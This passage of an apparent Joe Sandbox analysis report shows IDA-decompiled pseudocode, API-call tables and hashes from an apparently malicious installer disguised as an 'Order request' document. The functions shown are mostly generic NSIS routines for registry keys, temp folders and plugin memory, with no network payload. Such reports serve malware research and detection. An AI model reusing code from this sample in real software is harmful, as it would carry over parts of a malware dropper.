					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
				return 0;
			}











                                                0x0040237c
                                                0x00402381
                                                0x0040238b
                                                0x00402395
                                                0x00402398
                                                0x004023b2
                                                0x004023b9
                                                0x004023c1
                                                0x004023cf
                                                0x004023d3
                                                0x004023de
                                                0x004023de
                                                0x004023e5
                                                0x004023e9
                                                0x004023ef
                                                0x004023f4
                                                0x004023f4
                                                0x004023f8
                                                0x00402404
                                                0x00402404
                                                0x00402415
                                                0x0040241d
                                                0x0040241f
                                                0x0040241f
                                                0x00402422
                                                0x004024f6
                                                0x004024f6
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp
                                                • API String ID: 1356686001-1732896309
                                                • Opcode ID: c8d2024ca6914caa20ff415175f9df726a7bf297326ec571d110e4b150377c25
                                                • Instruction ID: eb15040666a4b84098e37ffbf96cc219ad532b268eb93921d51e5d7316b4335f
                                                • Opcode Fuzzy Hash: c8d2024ca6914caa20ff415175f9df726a7bf297326ec571d110e4b150377c25
                                                • Instruction Fuzzy Hash: 9B119D71A00108BEEB11AFA4DE89DAE76BDEB44358F11403AF904B21D1DAB89E409668
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405660 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1096 405660-4056ab CreateDirectoryW 1097 4056b1-4056be GetLastError 1096->1097 1098 4056ad-4056af 1096->1098 1099 4056d8-4056da 1097->1099 1100 4056c0-4056d4 SetFileSecurityW 1097->1100 1098->1099 1100->1098 1101 4056d6 GetLastError 1100->1101 1101->1099
                                                C-Code - Quality: 100%
                                                			E00405660(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083b0;
				_v36.Group = 0x4083b0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083a0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                0x0040566b
                                                0x0040566f
                                                0x00405672
                                                0x00405678
                                                0x0040567c
                                                0x00405680
                                                0x00405688
                                                0x0040568f
                                                0x00405695
                                                0x0040569c
                                                0x004056a3
                                                0x004056ab
                                                0x004056ad
                                                0x00000000
                                                0x004056ad
                                                0x004056b7
                                                0x004056be
                                                0x004056d4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004056d6
                                                0x004056da

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user~1\AppData\Local\Temp\), ref: 004056A3
                                                • GetLastError.KERNEL32 ref: 004056B7
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056CC
                                                • GetLastError.KERNEL32 ref: 004056D6
                                                Strings
                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405686
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                • API String ID: 3449924974-2382934351
                                                • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                • Instruction ID: a656050947ebfef5167fdf4c2b21dc35e266e59b00d64b4b83911e60c27c7584
                                                • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                • Instruction Fuzzy Hash: 94010871D00619EBEF019FA0C9087EFBBB8EB14314F10443AD549B6280E77996148FA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E00402BFF(void* _a4, short* _a8, intOrPtr _a12) {
				void* _v8;
				short _v532;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x7a8af0 | 0x00000008,  &_v8); // executed
				if(_t18 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402BFF(_v8,  &_v532, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00406408(3);
					if(_t27 == 0) {
						if( *0x7a8af0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyW(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x7a8af0, 0);
				}
				return _t18;
			}








                                                0x00402c20
                                                0x00402c28
                                                0x00402c50
                                                0x00402c3a
                                                0x00402c8a
                                                0x00402c90
                                                0x00000000
                                                0x00402c92
                                                0x00402c4e
                                                0x00000000
                                                0x00000000
                                                0x00402c4e
                                                0x00402c65
                                                0x00402c6d
                                                0x00402c74
                                                0x00402ca0
                                                0x00000000
                                                0x00000000
                                                0x00402ca8
                                                0x00402cb0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402cb0
                                                0x00000000
                                                0x00402c83
                                                0x00402c97

                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 38507b3aef3ee9abc9b8276ad5151edb672a95bd9cb7be4891eb61a897a54be5
                                                • Instruction ID: 96ecc02dbfbaaadde43e4edb48da855e10ebdec385bf1e19a14d4c4ac13e51f4
                                                • Opcode Fuzzy Hash: 38507b3aef3ee9abc9b8276ad5151edb672a95bd9cb7be4891eb61a897a54be5
                                                • Instruction Fuzzy Hash: 4E116A72904119BFEF109F90DF8CEAE3B79FB54384B10403AF906A10A0D7B48E55AA69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 92%
                                                			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A9(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A9(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A9(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E1000246C(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B5F(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E100028A4(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002645(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                0x10001759
                                                0x10001759
                                                0x10001759
                                                0x10001763
                                                0x1000176b
                                                0x10001778
                                                0x10001786
                                                0x10001789
                                                0x1000178b
                                                0x10001790
                                                0x10001795
                                                0x100018a8
                                                0x100018a8
                                                0x1000179b
                                                0x1000179f
                                                0x100017a2
                                                0x100017a7
                                                0x100017a8
                                                0x100017a9
                                                0x100017af
                                                0x100017b5
                                                0x100017e5
                                                0x100017ec
                                                0x10001810
                                                0x1000184f
                                                0x10001812
                                                0x10001812
                                                0x10001813
                                                0x10001816
                                                0x1000181c
                                                0x10001820
                                                0x10001823
                                                0x10001828
                                                0x10001828
                                                0x1000182f
                                                0x10001835
                                                0x1000183b
                                                0x10001847
                                                0x10001848
                                                0x1000184b
                                                0x100017ee
                                                0x100017ef
                                                0x10001804
                                                0x10001804
                                                0x10001859
                                                0x1000185c
                                                0x10001869
                                                0x10001870
                                                0x10001878
                                                0x1000187b
                                                0x1000187b
                                                0x10001878
                                                0x10001888
                                                0x10001890
                                                0x10001895
                                                0x10001888
                                                0x1000189d
                                                0x00000000
                                                0x1000189f
                                                0x00000000
                                                0x100018a0
                                                0x1000189d
                                                0x100017b9
                                                0x100017bc
                                                0x100017da
                                                0x00000000
                                                0x00000000
                                                0x100017dd
                                                0x100017e2
                                                0x100017e2
                                                0x100017e4
                                                0x00000000
                                                0x100017e4
                                                0x100017be
                                                0x100017bf
                                                0x100017c7
                                                0x100017c8
                                                0x00000000
                                                0x100017c8
                                                0x100017c1
                                                0x100017c2
                                                0x100017d0
                                                0x00000000
                                                0x100017d0
                                                0x100017c5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100017c5

                                                APIs
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D83
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D88
                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D8D
                                                • GlobalFree.KERNEL32 ref: 10001804
                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                • GlobalFree.KERNEL32 ref: 100018A0
                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                  • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32 ref: 100015CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                • String ID:
                                                • API String ID: 1791698881-3916222277
                                                • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E00401BDF() {
				signed int _t28;
				WCHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x14) = E00402BA2(3);
				 *(_t55 + 8) = E00402BA2(4);
				if(( *(_t55 - 0x18) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x14)) = E00402BBF(0x33);
				}
				__eflags =  *(_t55 - 0x18) & 0x00000002;
				if(( *(_t55 - 0x18) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402BBF(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x30)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402BBF();
					_t28 = E00402BBF();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExW( *(_t55 - 0x14),  *(_t55 + 8), _t31,  ~( *_t28) & _t28); // executed
					goto L10;
				} else {
					_t52 = E00402BA2();
					_t37 = E00402BA2();
					_t48 =  *(_t55 - 0x18) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageW(_t52, _t37,  *(_t55 - 0x14),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutW(_t52, _t37,  *(_t55 - 0x14),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x2c)) >= _t42) {
					_push( *(_t55 - 8));
					E00405F79();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                0x00401be8
                                                0x00401bf4
                                                0x00401bf7
                                                0x00401c00
                                                0x00401c00
                                                0x00401c03
                                                0x00401c07
                                                0x00401c10
                                                0x00401c10
                                                0x00401c13
                                                0x00401c17
                                                0x00401c19
                                                0x00401c66
                                                0x00401c68
                                                0x00401c73
                                                0x00401c7d
                                                0x00401c80
                                                0x00401c80
                                                0x00401c89
                                                0x00000000
                                                0x00401c1b
                                                0x00401c22
                                                0x00401c24
                                                0x00401c2c
                                                0x00401c2f
                                                0x00401c57
                                                0x00401c8f
                                                0x00401c8f
                                                0x00401c31
                                                0x00401c3f
                                                0x00401c47
                                                0x00401c4a
                                                0x00401c4a
                                                0x00401c2f
                                                0x00401c92
                                                0x00401c95
                                                0x00401c9b
                                                0x004029f2
                                                0x004029f2
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • SendMessageTimeoutW.USER32 ref: 00401C3F
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 8319822774fdde759edfcdb62c3affa0c5abdf9aa0933c2ceeb1a99f4013fbda
                                                • Instruction ID: 0a841d9a538a1c78525c7c746850703aa7529d4a1cc505f1b812f839afa95e13
                                                • Opcode Fuzzy Hash: 8319822774fdde759edfcdb62c3affa0c5abdf9aa0933c2ceeb1a99f4013fbda
                                                • Instruction Fuzzy Hash: 4B219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B88A409B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405EFF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E00405EFF(void* _a4, int _a8, short* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExW(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x800;
					_t23 = RegQueryValueExW(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x7fe] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}







                                                0x00405f0f
                                                0x00405f11
                                                0x00405f1e
                                                0x00405f29
                                                0x00405f31
                                                0x00405f36
                                                0x00405f4a
                                                0x00405f52
                                                0x00405f60
                                                0x00405f60
                                                0x00405f66
                                                0x00405f6d
                                                0x00000000
                                                0x00405f6d
                                                0x00405f76

                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,ExecToStack,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405F29
                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405F4A
                                                • RegCloseKey.KERNELBASE(?,?,00406172,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405F6D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: ExecToStack
                                                • API String ID: 3677997916-166031814
                                                • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                • Instruction ID: 550e653c67ea0eb77a08417ddc9dcc7927ab5f79673ec66d03fd3a0aafaa2bf7
                                                • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                • Instruction Fuzzy Hash: AC015A3110020AEACF218F26ED08EDB3BACEF88350F00403AF844D2260D774D964DBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405C36(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a574; // 0x61
